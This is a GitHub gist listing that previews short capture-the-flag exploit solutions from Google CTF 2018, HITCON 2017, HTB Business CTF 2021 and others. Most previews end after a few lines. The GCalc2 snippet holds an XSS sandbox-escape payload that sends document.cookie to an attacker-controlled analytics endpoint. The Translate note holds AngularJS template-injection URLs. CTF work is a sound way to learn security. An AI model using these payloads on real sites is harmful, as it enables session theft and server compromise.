Skip to content

Instantly share code, notes, and snippets.

View simple-pwn.py
'''
Exploit for the "Employee Manager" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''
import re
from pwn import *
View mips-pwn.py
'''
Exploit for the "Spim Panel" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''
from pwn import *
def pack(x):
return p32(x, endian='big')
View zn2021_hackquest_quantum_service_exp.py
from math import pi
from socket import socket
s = socket()
s.connect(('quantum.kelte.cc', 17171))
prog = ''
# Hadamard for the 0th qubit
prog += 'H\n'
@beched
beched / gcalc2_exp.py
Last active Jun 27, 2018
Google CTF 2018 Quals: GCalc2 web task solution
View gcalc2_exp.py
from urllib import quote_plus
ga_tid = 'UA-***-1' # put your GA id here
url = 'https://gcalc2.web.ctfcompetition.com/'
url += r'?expr=vars.pi.constructor.name.constructor.constructor(vars.pi.constructor.name.match().constructor(vars).keys().constructor.keys(vars).pop())()&vars=%7B%22pi%22:1.0,%22'
url += quote_plus('''
script = document.createElement('script');script.src='https://www.google-analytics.com/collect?v=1&tid=%s&cid='+Math.random()+'&t=event&ec=email&el='+Math.random()+'&cs=newsletter&cm=email&cn='+document.cookie+'&cm1=1&ea=test';document.head.appendChild(script);
'''.replace('"', '\\"').replace('\n','') % ga_tid)
@beched
beched / translate_exp.txt
Created Jun 25, 2018
Google CTF 2018 Quals: Translate web task solution
View translate_exp.txt
This web application implements a translation service with dictionary stored in memory.
One can dump the JSON dictionary and add values to it.
Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are rather web-site messages, not the words).
The solution is to overwrite the rendered dictionary value and to enumerate methods accessible inside AngularJS sandbox and find a method which allows local file inclusion.
Executing Object.keys():
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}}
Reading the flag:
@beched
beched / sftp_exp.py
Last active May 9, 2020
Google CTF 2018 Quals: SFTP pwn task solution
View sftp_exp.py
import time
import sys
from collections import defaultdict
from ctypes import CDLL
from pwn import *
from z3 import *
s = Solver()
View baby-exp.py
'''
HITCON CTF Quals 2017 BabyFirst Revenge v2 exploit
Task was to leverage 4-byte shell command execution in PHP to full RCE
'''
from requests import get, post
URL = 'http://52.197.41.31/?'
print 'Reset all'